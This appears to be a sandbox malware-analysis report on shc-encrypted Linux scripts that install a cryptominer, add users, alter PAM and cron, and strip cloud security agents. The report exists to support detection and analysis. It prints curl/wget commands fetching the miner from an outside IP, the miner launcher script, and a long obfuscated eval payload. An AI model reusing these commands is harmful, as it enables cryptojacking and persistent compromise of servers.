/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/usr/bin/mv

[mv config-xrx.json config.json]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/usr/bin/mv

[mv config-xrx.json config.json]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/usr/bin/grep

[grep -q secure]

/usr/bin/cat

[cat /etc/crontab]

/usr/bin/sleep

[sleep 1]

/var/tmp/.xrx/xrx

[/var/tmp/.xrx/xrx]

/usr/bin/pgrep

[pgrep xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
IT 185.252.178.82:6972 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/49/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1803/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1952/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2129/stat /usr/bin/pidof N/A
File opened for reading /proc/2476/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2326/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2473/stat /usr/bin/pidof N/A
File opened for reading /proc/3/stat /usr/bin/pidof N/A
File opened for reading /proc/38/cmdline /usr/bin/pidof N/A
File opened for reading /proc/43/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1911/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2191/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2/stat /usr/bin/pidof N/A
File opened for reading /proc/194/stat /usr/bin/pidof N/A
File opened for reading /proc/1116/stat /usr/bin/pidof N/A
File opened for reading /proc/15/cmdline /usr/bin/pidof N/A
File opened for reading /proc/191/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1044/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1957/cmdline /usr/bin/pidof N/A
File opened for reading /proc/21/cmdline /usr/bin/pidof N/A
File opened for reading /proc/191/stat /usr/bin/pidof N/A
File opened for reading /proc/1392/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2283/stat /usr/bin/pidof N/A
File opened for reading /proc/2475/cmdline /usr/bin/pidof N/A
File opened for reading /proc/12/cmdline /usr/bin/pidof N/A
File opened for reading /proc/18/stat /usr/bin/pidof N/A
File opened for reading /proc/31/stat /usr/bin/pidof N/A
File opened for reading /proc/202/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1703/cmdline /usr/bin/pidof N/A
File opened for reading /proc/55/stat /usr/bin/pidof N/A
File opened for reading /proc/787/cmdline /usr/bin/pidof N/A
File opened for reading /proc/8/cmdline /usr/bin/pidof N/A
File opened for reading /proc/22/cmdline /usr/bin/pidof N/A
File opened for reading /proc/36/cmdline /usr/bin/pidof N/A
File opened for reading /proc/49/stat /usr/bin/pidof N/A
File opened for reading /proc/52/stat /usr/bin/pidof N/A
File opened for reading /proc/1693/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1770/stat /usr/bin/pidof N/A
File opened for reading /proc/1911/stat /usr/bin/pidof N/A
File opened for reading /proc/17/stat /usr/bin/pidof N/A
File opened for reading /proc/32/stat /usr/bin/pidof N/A
File opened for reading /proc/357/stat /usr/bin/pidof N/A
File opened for reading /proc/1246/stat /usr/bin/pidof N/A
File opened for reading /proc/1331/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1935/stat /usr/bin/pidof N/A
File opened for reading /proc/2227/stat /usr/bin/pidof N/A
File opened for reading /proc/2303/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2265/stat /usr/bin/pidof N/A
File opened for reading /proc/6/stat /usr/bin/pidof N/A
File opened for reading /proc/386/stat /usr/bin/pidof N/A
File opened for reading /proc/1057/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1794/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1990/cmdline /usr/bin/pidof N/A
File opened for reading /proc/765/cmdline /usr/bin/pidof N/A
File opened for reading /proc/772/stat /usr/bin/pidof N/A
File opened for reading /proc/1964/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1/stat /usr/bin/pidof N/A
File opened for reading /proc/39/stat /usr/bin/pidof N/A
File opened for reading /proc/51/stat /usr/bin/pidof N/A
File opened for reading /proc/63/stat /usr/bin/pidof N/A
File opened for reading /proc/601/stat /usr/bin/pidof N/A
File opened for reading /proc/1985/stat /usr/bin/pidof N/A
File opened for reading /proc/2013/cmdline /usr/bin/pidof N/A
File opened for reading /proc/195/cmdline /usr/bin/pidof N/A

Processes

/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B -c exec '/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B' "$@" /tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B -c #!/bin/bash if [[ $(cat config.json | grep xxcountxx) ]]; then echo "configuring miner" sed -i "s/xxcountxx/$(nproc)/g" config.json else echo "using preconfigured miner" fi PID=$(pidof xrx) if [ $# -eq 0 ]; then ##if no arguments if [ -z "${PID}" ]; then ./xrx </dev/null &>/dev/null & disown -h %1 echo "miner online" else echo "miner already online" fi fi /tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/usr/bin/cat

[cat config.json]

/usr/bin/grep

[grep xxcountxx]

/usr/bin/pidof

[pidof xrx]

/tmp/样本/Linux/shc加密脚本/xrx

[./xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:50

Platform

debian9-mipsbe-20240418-en

Max time kernel

0s

Command Line

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Signatures

N/A

Processes

/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

144s

Max time network

129s

Command Line

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

Signatures

Modifies password files for system users/ groups

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/gshadow /usr/sbin/useradd N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/useradd N/A
File opened for modification /etc/group /usr/sbin/useradd N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/gshadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/useradd N/A
File opened for modification /etc/group /usr/sbin/usermod N/A

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Modifies PAM framework files

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/pam.d/common-auth /bin/bash N/A

OS Credential Dumping

credential_access
Description Indicator Process Target
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/useradd N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/dpkg-preconfigure N/A
File opened for reading /etc/shadow /usr/bin/chattr N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/sbin/usermod N/A

Adds a user to the system

Description Indicator Process Target
N/A N/A /usr/sbin/useradd N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/class/dmi/id/product_name /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/sys_vendor /usr/bin/systemd-detect-virt N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /usr/bin/touch N/A

Deletes log files

defense_evasion
Description Indicator Process Target
File deleted /var/log/apt/eipp.log.xz /usr/bin/apt-get N/A

Enumerates running processes

Modifies special file permissions

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/sbin/rdmsr.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/sbin/wrmsr.dpkg-new /usr/bin/dpkg N/A

Reads process memory

credential_access
Description Indicator Process Target
File opened for reading /proc/823/maps /usr/sbin/needrestart N/A
File opened for reading /proc/892/maps /usr/sbin/needrestart N/A
File opened for reading /proc/598/maps /usr/sbin/needrestart N/A
File opened for reading /proc/785/maps /usr/sbin/needrestart N/A
File opened for reading /proc/438/maps /usr/sbin/needrestart N/A
File opened for reading /proc/599/maps /usr/sbin/needrestart N/A
File opened for reading /proc/777/maps /usr/sbin/needrestart N/A
File opened for reading /proc/784/maps /usr/sbin/needrestart N/A
File opened for reading /proc/1/maps /usr/sbin/needrestart N/A
File opened for reading /proc/389/maps /usr/sbin/needrestart N/A
File opened for reading /proc/744/maps /usr/sbin/needrestart N/A
File opened for reading /proc/769/maps /usr/sbin/needrestart N/A
File opened for reading /proc/787/maps /usr/sbin/needrestart N/A
File opened for reading /proc/418/maps /usr/sbin/needrestart N/A
File opened for reading /proc/588/maps /usr/sbin/needrestart N/A
File opened for reading /proc/761/maps /usr/sbin/needrestart N/A
File opened for reading /proc/773/maps /usr/sbin/needrestart N/A
File opened for reading /proc/820/maps /usr/sbin/needrestart N/A
File opened for reading /proc/828/maps /usr/sbin/needrestart N/A
File opened for reading /proc/357/maps /usr/sbin/needrestart N/A
File opened for reading /proc/750/maps /usr/sbin/needrestart N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself pool-spawner /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gmain /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gdbus /usr/bin/gdbus N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/systemd-detect-virt N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/2602/status /usr/bin/pkill N/A
File opened for reading /proc/1052/ctty /usr/bin/pkill N/A
File opened for reading /proc/54/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1047/root/usr/lib/python3.12/tarfile.py /usr/sbin/needrestart N/A
File opened for reading /proc/2245/status /usr/bin/pkill N/A
File opened for reading /proc/23/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2288/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1047/root/usr/lib/python3.12/pprint.py /usr/sbin/needrestart N/A
File opened for reading /proc/892/status /usr/bin/pkill N/A
File opened for reading /proc/2173/stat /usr/bin/pkill N/A
File opened for reading /proc/785/cgroup /usr/bin/pkill N/A
File opened for reading /proc/27/status /usr/bin/pkill N/A
File opened for reading /proc/389/ctty /usr/bin/pkill N/A
File opened for reading /proc/63/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1073/ctty /usr/bin/pkill N/A
File opened for reading /proc/1897/stat /usr/bin/pkill N/A
File opened for reading /proc/2206/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1792/stat /usr/bin/pkill N/A
File opened for reading /proc/2000/status /usr/bin/pkill N/A
File opened for reading /proc/2200/ctty /usr/bin/pkill N/A
File opened for reading /proc/357/stat /usr/bin/pkill N/A
File opened for reading /proc/63/status /usr/bin/pkill N/A
File opened for reading /proc/275/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1959/stat /usr/sbin/needrestart N/A
File opened for reading /proc/1692/status /usr/bin/pkill N/A
File opened for reading /proc/14/ctty /usr/bin/pkill N/A
File opened for reading /proc/787/status /usr/bin/pkill N/A
File opened for reading /proc/1776/cmdline /usr/bin/pkill N/A
File opened for reading /proc/56/environ /usr/sbin/needrestart N/A
File opened for reading /proc/386/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/2545/stat /usr/bin/pkill N/A
File opened for reading /proc/13/ctty /usr/bin/pkill N/A
File opened for reading /proc/34/cgroup /usr/bin/pkill N/A
File opened for reading /proc/80/ctty /usr/bin/pkill N/A
File opened for reading /proc/48/environ /usr/sbin/needrestart N/A
File opened for reading /proc/2226/status /usr/bin/pkill N/A
File opened for reading /proc/1981/ctty /usr/bin/pkill N/A
File opened for reading /proc/196/stat /usr/bin/pkill N/A
File opened for reading /proc/357/ctty /usr/bin/pkill N/A
File opened for reading /proc/1689/stat /usr/bin/pkill N/A
File opened for reading /proc/11/status /usr/bin/pkill N/A
File opened for reading /proc/202/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2145/stat /usr/bin/pkill N/A
File opened for reading /proc/202/cgroup /usr/bin/pkill N/A
File opened for reading /proc/55/cmdline /usr/bin/pkill N/A
File opened for reading /proc/199/stat /usr/bin/pkill N/A
File opened for reading /proc/2602/cmdline /usr/bin/pkill N/A
File opened for reading /proc/769/status /usr/bin/pkill N/A
File opened for reading /proc/80/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1117/cmdline /usr/bin/pkill N/A
File opened for reading /proc/9/ctty /usr/bin/pkill N/A
File opened for reading /proc/1124/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1/ctty /usr/bin/pkill N/A
File opened for reading /proc/195/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1950/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1967/cgroup /usr/bin/pkill N/A
File opened for reading /proc/198/status /usr/bin/pkill N/A
File opened for reading /proc/1082/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2000/stat /usr/bin/pkill N/A
File opened for reading /proc/784/status /usr/bin/pkill N/A
File opened for reading /proc/2253/status /usr/bin/pkill N/A
File opened for reading /proc/56/ctty /usr/bin/pkill N/A
File opened for reading /proc/892/ctty /usr/bin/pkill N/A
File opened for reading /proc/23/cmdline /usr/sbin/needrestart N/A

Software Deployment Tools

execution
Description Indicator Process Target
N/A N/A /usr/bin/dpkg N/A
N/A N/A /usr/bin/apt-get N/A
N/A N/A /usr/bin/dpkg-split N/A

Processes

/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383 -c exec '/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383' "$@" /tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383 -c #!/bin/bash z=" ";xFz='Vwn';SDz='b';fDz='hen';VLz='sh_';xJz='XJB';MJz='> ~';BLz='t=$';LIz='2.1';eCz='Yun';hLz='MR"';UJz='aG ';OHz='5.2';gHz='s c';RLz='4';PFz='w';YFz='ser';TFz='for';sHz='d1 ';EKz='tRG';EBz='ing';IBz='l"';OCz='|/z';eFz='$6$';kEz='uth';lz='); ';ZHz='475';hKz='wn ';sFz='yyz';rDz='xri';pCz='nin';DFz='ssh';EHz='g >';vBz='ll';dDz='" ]';FGz='h3d';jEz='h/a';JFz='ey ';kKz='rsb';RJz='d c';lBz='s"';mBz='t i';kDz='n/c';qFz='j7.';HGz='W55';DCz='c/p';bFz='rmo';fKz='& d';HEz='o -';gFz='vRN';CEz='lib';QDz=' /e';qBz=' 2>';aJz='eki';vz='/de';ODz='ont';SEz='/.s';XBz='yum';AKz='K89';QCz='ish';SCz='d: ';yEz='ory';GLz='43.';QKz='/tm';RFz='ssw';CFz='~/.';Nz='Gre';wIz='> $';YEz='eys';EIz='|| ';IGz='9vf';BHz='swd';AIz='.17';RKz='p/.';IIz='://';PHz='52.';iGz='e/.';iFz='SAx';vCz='-rf';uGz='t >';FBz=' wg';PEz='nit';xGz='/us';nCz='.xr';cDz=' "$';lKz='64=';lFz='EPo';VIz='m.d';Sz='2m'\''';TBz=' /d';fEz='g s';WCz=''\''\n';fIz='mfi';UEz='aut';XHz='et ';aKz='.x/';YHz='-q ';qGz='ome';tFz='rMl';Uz='or_';ILz='.18';ZFz='s';Pz=''\''\0';tDz='-ST';rBz='&1 ';BBz=' "i';PDz='ab';XIz='mmo';wJz='msu';LGz='2Fq';KIz='.25';MBz='-re';UKz='CP ';fGz='OME';wFz='bJl';EFz=' +i';hGz='hom';CBz='nst';OGz='/'\'' ';oDz='ed ';lIz='exe';THz='72/';IJz='x $';aGz=' sh';tGz='roo';uBz='/nu';HFz='"ss';aCz='rem';YBz=' in';ZBz='sta';WDz='ron';sIz='hto';bIz='! g';sDz='xrx';oCz='x/u';eGz=' $H';aHz='5 /';aDz='[ !';qKz='s h';XDz='tab';CDz='uni';cGz=' '\''e';WKz='/se';Vz='Off';sCz='sh ';cHz='u+s';dFz='p '\''';kCz='/va';eIz='$pa';PCz='|/f';mJz='XUh';mKz=' '\'' ';ADz='/.x';nEz='_ke';oGz='x/k';YLz='t0';BIz='8.8';BJz='wd';gKz='iso';SGz='me ';VJz='sud';HCz='rep';RIz='tms';KLz='010';LJz='=/v';QGz='u $';aLz=' "K';BKz='vGf';jCz='+x ';SFz='d';sGz='e';qIz='xpo';nz='n';MLz='?us';NIz='82:';WFz='ame';GJz='c';Yz='31m';lCz='r/t';rz=' -v';GKz='bA/';jGz='/au';cEz=' "r';wGz='n/p';cz='Blu';eDz='; t';iCz='od ';FEz=' -a';Oz='en=';jHz=' /s';nJz='HF2';NDz='/cr';OJz='ash';bCz='ovi';XEz='d_k';uDz='OP ';JLz='9:1';bBz='l 2';QFz='/pa';oBz='-to';VBz='nul';REz='f ~';uIz='sbi';Tz='Col';bJz='vrC';FFz='a ~';QJz='rad';Ez=';36';VKz='.x';SLz='his';xDz='dhc';GHz='rig';ELz=' -s';tJz='Fo6';CIz='2:6';Wz='[0m';Mz=''\''';sKz='.43';pEz='1';mGz='ed_';HJz=' xr';QHz='178';bz='33m';OBz='tal';vGz='ae ';PGz='$us';KCz='/ba';mz='the';JBz='apt';GBz='et/';RDz='tc/';gGz=''\'')';YIz='n-a';yIz='x';Kz='[0;';HLz='154';hz='$EU';eBz='fi';dCz='Ali';TKz='g S';Iz='='\''\';cCz='ng ';AJz='x/p';oHz='pam';DBz='all';HBz='cur';rGz='don';jFz='xOm';gEz='key';fJz='eIe';AFz='mkd';eKz='&>/';dIz=' pa';XKz='x/s';oz='! c';SIz='s >';jDz='/bi';nHz='/sb';KBz='-ge';NGz='vZv';RGz='rna';bHz='d >';SHz=':69';gBz='msr';HDz='r';BGz='GqX';qDz='-9 ';IKz='IRX';NKz='! -';VFz='ern';CKz='1YH';LDz='a /';VDz='c/c';xHz='85.';ez=';34';TIz='fil';ZJz='che';xIz='els';rFz='iqv';dJz='a.m';kBz='ool';TLz='tor';EGz='dOL';tCz='2&>';hDz='x/c';uCz='rm ';FKz='GsN';xCz='ar/';cKz='ure';GDz='b -';xEz='ect';uz='&> ';SKz='x ]';wDz='xmu';JDz='ttr';ZCz='e "';yGz='r/b';HKz='eTI';uHz=' ht';pDz='pki';NHz='/18';dBz=' > ';bLz='ONO';WEz='ize';hEz=' ~/';ZEz=' ];';OKz='d /';pJz='le/';CHz='mv ';jIz='ona';qEz='ys2';vKz='89:';cLz=' DI';JHz='l -';CJz='brc';aBz='ll ';rHz='| c';jKz='%1';ZIz='f $';tBz='dev';fBz=' wr';hJz='i01';WGz='$(s';pHz='_tm';qCz='ll.';IEz='e $';LCz='sh\';EDz='cro';UGz='rho';Fz='m'\''';tEz='h ]';qHz='s |';yKz='s?u';MKz=' [ ';FHz='d.o';mEz='zed';QLz='sb6';nBz='s 2';ALz='lis';hIz='h o';yFz='yLn';PLz='=$u';yJz='TMM';Dz='3[0';oEz='ys ';YKz='ecu';KEz='min';XLz='ini';FDz='nta';TEz='sh/';LHz='htt';TCz='-f1';PIz='2/p';KFz='ena';DJz='=~/';wBz='dnf';NBz='ins';iEz='.ss';HIz='ttp';JGz='uBh';QIz='am_';yBz='rs=';oIz='uie';WLz='y';xKz='0/u';fz='if ';nDz='fix';XGz='udo';vEz='rea';yCz='tmp';sEz=' -d';VHz=' cd';tz='rl ';bKz='sec';VCz='tr ';DIz='972';GGz='xrF';fLz='3.3';lHz='ms ';cFz='d -';mCz='mp/';sz=' cu';rKz='179';gz='(( ';gDz='cp ';tIz='k /';NCz='in/';RCz=''\'' |';pz='omm';Xz='Red';uEz=' "c';Lz='35m';GCz='| g';IDz='cha';nKz='| b';pBz='ols';oJz='3fT';RHz='.82';mFz='7Yx';XFz=' $u';nGz='s ';Gz='Pur';AEz=' /u';Qz='33[';bGz=' -c';YJz='el ';iJz='KI3';OEz='./i';JJz='ali';pIz='t e';MEz='rti';WIz='/co';jz='== ';bEz='en';ZDz='=/b';hFz='ZIl';hBz=' &>';JCz='bin';rJz='AoR';GIz='q h';UDz='ch ';ICz=' '\''/';MIz='78.';FLz='79.';UBz='ev/';FIz='wge';OIz='697';kIz='l p';vJz='aBv';NJz='/.b';TJz='ki ';DKz='zhz';kFz='o$K';qJz='wXq';eEz='vin';NEz='ng"';gLz='! X';DEz='/up';iz='ID ';eHz='"pa';hCz='chm';iBz=' ms';QBz=' -y';NLz='erl';iDz='hat';DLz='cd1';fFz='8ai';rEz='&1';EJz='.ba';kGz='tho';dz='e='\''';dHz=' /b';mDz='o "';lEz='ori';xz='ull';AGz='9lW';nFz='0FC';gCz='"';GEz='ed';CGz='EDn';DHz='wd.';ECz='ass';IFz='h k';BFz='ir ';JEz='n "';LEz='er ';ZLz='it0';gIz='le;';ABz='o $';XCz=''\'' '\''';WJz='o c';kHz='m_t';MCz='|/b';wCz=' /v';LBz='t -';vHz='tp:';vFz='cMO';tHz='-sO';wHz='//1';PKz='var';KJz='as ';GFz='en ';dEz='emo';VEz='hor';rIz='se_';Cz='\03';TDz='tou';lJz='epj';pKz='64)';fCz='Dun';PBz='l i';FCz='wd ';UIz='e=/';Az='Cya';hHz='han';iKz='-h ';PJz='rc';TGz='-r ';yHz='252';qz='and';BEz='sr/';WHz='1 -';uKz='4.1';HHz='cd ';aEz=' th';Jz='033';pGz='erh';yDz='pi';oFz='NDi';wz='v/n';tKz='.15';ZKz='re ';bDz=' -f';BDz='rx/';uFz='S9w';jJz='RQU';SJz='hee';KDz=' -i';aIz='e ]';LFz='ble';iHz='ged';MFz='d"';xBz='use';dKz=' </';cJz='8Hy';sBz='> /';UFz=' us';YCz=' '\'')';Zz='Yel';WBz='l';CLz='64 ';eJz='meU';uJz='97f';YDz='dir';vIz='" >';UCz=' | ';QEz='[ -';VGz='me=';EEz='dat';mIz='c.s';iIz='pti';LKz='me/';KKz='/ho';dGz='cho';Bz='n='\''';YGz=' -u';wEz='tin';gJz='m$L';KHz='sO ';LLz='ers';KGz='jAk';Hz='ple';mHz=']; ';lGz='riz';DGz='O3b';ZGz='me"';vDz='xxi';ULz='y -';aFz='do';CCz='/et';JKz='y5Y';nIz='o q';kz='0 )';fHz='ord';jBz='r-t';OLz='ist';IHz='n/';cIz=' -q';AHz='pas';BCz='at ';eLz='A V';dLz='O D';MGz='fKc';yz='ech';OFz='ado';rCz='sh';oKz='ase';wKz='101';NFz='/sh';pFz='uD6';kJz='pyY';JIz='185';UHz=' ||';FJz='shr';RBz='2>&';Rz='0;3';cBz='>&1';SBz='1 >';ACz='$(c';XJz='whe';sJz='0xU';MDz='etc';lDz='tr';MHz='p:/';az='low';DDz='.sh'; eval "$Az$Bz$Cz$Dz$Ez$Fz$z$Gz$Hz$Iz$Jz$Kz$Lz$Mz$z$Nz$Oz$Pz$Qz$Rz$Sz$z$Tz$Uz$Vz$Iz$Jz$Wz$Mz$z$Xz$Iz$Jz$Kz$Yz$Mz$z$Zz$az$Iz$Jz$Kz$bz$Mz$z$cz$dz$Cz$Dz$ez$Fz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$oz$pz$qz$rz$sz$tz$uz$vz$wz$xz$z$mz$nz$z$yz$ABz$Gz$Hz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$z$JBz$KBz$LBz$MBz$NBz$OBz$PBz$CBz$DBz$QBz$sz$tz$RBz$SBz$TBz$UBz$VBz$WBz$z$XBz$QBz$YBz$ZBz$aBz$HBz$bBz$cBz$dBz$vz$wz$xz$z$eBz$z$fz$oz$pz$qz$rz$fBz$gBz$hBz$TBz$UBz$VBz$WBz$z$mz$nz$z$yz$ABz$Zz$az$BBz$CBz$DBz$EBz$iBz$jBz$kBz$lBz$z$JBz$KBz$mBz$CBz$DBz$QBz$iBz$jBz$kBz$nBz$cBz$dBz$vz$wz$xz$z$XBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$wBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$eBz$z$eBz$z$xBz$yBz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$YCz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$yz$ABz$cz$ZCz$aCz$bCz$cCz$dCz$eCz$fCz$gCz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$rCz$z$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$sCz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$w